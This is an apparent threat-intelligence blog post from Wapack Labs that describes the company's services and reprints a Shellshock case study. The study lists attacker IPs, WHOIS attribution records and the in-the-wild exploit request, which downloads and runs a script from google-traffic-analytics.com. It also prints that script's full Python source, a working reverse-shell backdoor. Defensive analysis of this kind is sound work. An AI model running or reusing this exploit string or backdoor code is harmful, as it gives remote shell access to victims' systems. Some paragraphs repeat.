At least three times every week I get asked by someone "What's the difference between Wapack Labs and Red Sky Alliance?" "Who is your target customer?" "What product do we deliver?" "What's your distribution look like?"
So let's start here...
Wapack Labs is an intelligence, research and analysis company. We sell information.
So let's start here...
Wapack Labs is an intelligence, research and analysis company. We sell information.
- Wapack Labs authors sources and sells intelligence, research and analysis. We deliver it in many forms, to many places... Red Sky Alliance/Beadwindow, the FS-ISAC, Subscriptions, OEM, Threat Recon, etc. We publish in PDF, STIX, HTML, CSV, and JSON.
- Security researchers go to Red Sky Alliance to share notes, build the story, and together, protect their networks. What happens in Red Sky Alliance, stays in Red Sky Alliance. It's private. There's no government involvement. We don't care how you interact with DSS, the regulators, or any other government organization --that's your choice. Red Sky Alliance exists to help improve your security. The private portal is ALWAYS busy. We've added university users, and just this week, another Icelandic bank.
- For government security researchers we offer a second collaborative... Beadwindow --delivered in Threat Connect. They do not get access to the Red Sky private portal, but they do get information that they may care about. We've delivered cyber warnings, dumped credential caches and targeting, to several government agencies directly, and for others, we push stuff through Beadwindow to contacts at the 24th AF and the US MDA. None of the US Cyber Centers participate, so if you're a state, local or .gov who needs help, call us. We can help. And our stuff is UNCLASSIFIED! You can actually use it!
We published this report in it's entirety last week.
We took a bit of a different approach on what seemed to be the hottest topic of the last two weeks - Shellshock. (Need information on Shellshock? Try here.)
We're looking for use cases where we might help protect against. This is one of three case studies that we'd identified, taking advantage of Shellshock.
You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-Suite, but this report is lower level. We show all of our work and sources. When done, it's gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.
So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;)
You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-Suite, but this report is lower level. We show all of our work and sources. When done, it's gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.
So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;)
SHELLSHOCK CASE STUDY AND INFRASTRUCTURE
Beginning on 24 September 2014, hackers and researchers began exploiting the widely publicized Shellshock bash vulnerability, described in CVE -2014-6271. The majority of the initial activity involved mass vulnerability scanning by white hats and black hats alike. Examination of scanning activity showed a peak on September 27th with a sharp decline as of September29th . This spike and sudden decrease may be a result of what is likely wide-scale patching of the vulnerability. Alternatively, this may mark the end of exploiting the vulnerability for reconnaissance purposes and could signal a move up the kill-chain into more targeted operations.
Legacy Scamming infrastructure re-emerges with Shellshock
A recently observed instance of Shellshock in the wild took the form of a Python implemented backdoor hosted on google-traffic-analytics.com. Table 5 lists the observed originating IPs along with the Shellshock request:
Originating IPs
|
Shellshock Request
|
14.163.12.119
77.29.189.34
78.15.20.81
78.161.195.166
79.136.130.110
88.253.229.151
93.139.212.67
109.227.100.189
112.156.18.40
113.171.116.163
117.218.186.16
118.172.123.111
119.130.114.154
124.123.75.68
178.120.175.81
178.121.79.68
190.49.241.220
190.82.114.190
223.206.54.26
|
() { :;}; /bin/bash -c '/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm
|
!/usr/bin/env python
from socket import *
import os
from time import sleep
import sys
fpid = os.fork()
if fpid!=0:
host='stats.google-traffic-analytics.com'
port=9091
sockobj = None
############################################
sockobj = None
recv = False
def connect():
try:
sockobj=socket(AF_INET,SOCK_STREAM)
sockobj.connect((host,port))
return sockobj
except:
return False
while True:
while not sockobj:
sockobj = connect()
print "[*] Trying to reconnect..."
sleep(1)
if sockobj:
recv = sockobj.recv(1024)
#print recv
if not recv: sockobj = False; break;
cmd = recv.strip()
res = os.popen(cmd).read()
if res:
sockobj.sendall(res)
|
Legacy Whois Record
| Current Record
|
Registrant Contact:
Goga Gastoyan
Goga Gastoyan Goga Gastoyan bash@blogbuddy.ru
+7.4957452002 fax: +7.4957452002
Pokryshkina d.36 kv.36
Moscow Moscow 119602
ru
|
Admin Name: Radovanka Janekovic
Admin Organization: Goga Gastoyan
Admin Street: Ljubljanska 6
Admin City: Bled
Admin State/Province: Bled
Admin Postal Code: 4260
Admin Country: SI
Admin Phone: +386.15765749
Admin Phone Ext:
Admin Fax: +386.15765749
Admin Fax Ext:
Admin Email: support@google-traffic-analytics.com
|
Table 5. google-traffic-analytics.com Scanning Nodes
Upon successful exploitation, a CURL request is made for http://google-traffic-analytics.com/cl.py. The Python script (cl.py) is a simple yet effective Backdoor that works on both Linux and Windows. It also has a zero detection on Virus Total [1]. The configured C2 address is hosted on subdomain stats.google-traffic-analytics.com. The downloaded python script will attempt connection C2 on port 9091 and if the C2 is listening - a shell is opened up to the victim.
During testing, a the C2 node issued a uname –a command which prints all available information about a Linux system [2]. [Comment: No additional activity was observed.] (See Mitigations section for a SNORT signature)
The re-emergence of this domain after an apparent four year hiatus begs the question of whether it belongs to the same attackers. A Whois history report from Domain Tools lists the registrant during 2010 as “Goga Gastoyan”, (bash@blogbuddy.ru), however this changed in 2013 to the current owner “Radovanka Janekovic”. Further inspection of the records revealed Goga Gastoyan as the Admin organization in the new record – thus confirming likely attribution to the same attackers. With the connection made to the legacy infrastructure, one could assume that this latest activity involving Shellshock could be the most recent attempt to expand the spamming network.
Table 6. Whois Record Comparison
[1] https://www.virustotal.com/en/file/052421011162421c7fbe1c9613e37b520a494034901dab1c6ee192466090421d/analysis/
[2] http://linux.about.com/library/cmd/blcmdl1_uname.htm
[3] http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html
------------------------------------------------------
I realize this is pretty technical, but I thought it important to offer a simple slice of some of the work we do. This report is the basis for nearly everything else. These reports, when complete are farmed for placement in Threat Recon. This information, sourced by the lab, is thought to be high confidence (although we never score anything perfect!).
This week is again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.
Have a great weekend!
Jeff
This week is again, crazy. I'm on the podium at 9:00 at the FS-ISAC conference, and we've got a heck of a topic. I'm looking forward to seeing you all there.
Have a great weekend!
Jeff